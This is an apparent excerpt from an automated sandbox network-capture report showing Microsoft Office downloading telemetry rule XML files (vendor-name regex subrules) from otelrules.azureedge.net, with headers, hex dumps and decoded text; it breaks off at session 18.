                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              8192.168.2.64973213.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:16 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:17 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:16 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 471
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                              ETag: "0x8DC582BB10C598B"
                                                                                                              x-ms-request-id: c2908fd4-501e-00a0-4ac8-459d9f000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093816Z-1746fd949bdzd2qvhC1EWRcygw00000002ag000000001xn7
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:17 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              9192.168.2.64973313.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:16 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:17 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:16 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 632
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                              ETag: "0x8DC582BB6E3779E"
                                                                                                              x-ms-request-id: 4a622c55-e01e-0099-7fc1-45da8a000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093816Z-1746fd949bdfg4slhC1EWR34t000000002fg000000000tn5
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:17 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              10192.168.2.64973413.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:16 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:17 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:16 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 467
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                              ETag: "0x8DC582BA6C038BC"
                                                                                                              x-ms-request-id: dbf49064-101e-00a2-1bc6-459f2e000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093816Z-1746fd949bd54zxghC1EWRzre400000002q0000000008mvd
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:17 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              11192.168.2.64973113.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:18 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:18 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:18 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 474
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                              ETag: "0x8DC582B9964B277"
                                                                                                              x-ms-request-id: 4628c04c-d01e-0017-18cc-45b035000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093818Z-1746fd949bdw2rg8hC1EWR11u400000002qg000000007byy
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:18 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              12192.168.2.64973713.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:18 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:19 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:19 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 407
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                              ETag: "0x8DC582BBAD04B7B"
                                                                                                              x-ms-request-id: 2b878731-501e-008c-34ce-45cd39000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093819Z-1746fd949bdjrnwqhC1EWRpg2800000002ng0000000025sq
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:19 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              13192.168.2.64973813.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:18 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:19 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:19 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 427
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                              ETag: "0x8DC582BA310DA18"
                                                                                                              x-ms-request-id: 6818e2c2-d01e-0065-16d2-45b77a000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093819Z-1746fd949bdkw94lhC1EWRxuz400000002s0000000001ez8
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:19 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              14192.168.2.64974013.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:18 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:19 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:19 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 486
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                              ETag: "0x8DC582BB344914B"
                                                                                                              x-ms-request-id: c2a94a43-501e-00a0-7dd0-459d9f000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093819Z-1746fd949bddgsvjhC1EWRum2c00000002rg000000006nbb
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:19 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              15192.168.2.64973913.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:18 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:19 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:19 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 486
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                              ETag: "0x8DC582B9018290B"
                                                                                                              x-ms-request-id: 6223bc78-401e-0015-38b6-450e8d000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093819Z-1746fd949bdw2rg8hC1EWR11u400000002s0000000005nte
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:19 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              16192.168.2.64974113.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:20 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:20 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:20 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 407
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                              ETag: "0x8DC582B9698189B"
                                                                                                              x-ms-request-id: 864f0b94-901e-00a0-42cc-456a6d000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093820Z-1746fd949bd77mkmhC1EWR5efc00000002qg000000007w2x
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:20 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              17192.168.2.64974213.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:21 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:21 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:21 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 469
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                              ETag: "0x8DC582BBA701121"
                                                                                                              x-ms-request-id: b5189c33-801e-008c-34cb-457130000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093821Z-1746fd949bdtlp5chC1EWRq1v400000002c00000000080p3
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:21 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              18192.168.2.64974313.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:21 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:21 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:21 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 415
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                              ETag: "0x8DC582BA41997E3"
                                                                                                              x-ms-request-id: 16655d81-601e-0084-07c4-456b3f000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093821Z-1746fd949bdw2rg8hC1EWR11u400000002rg000000006agx
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
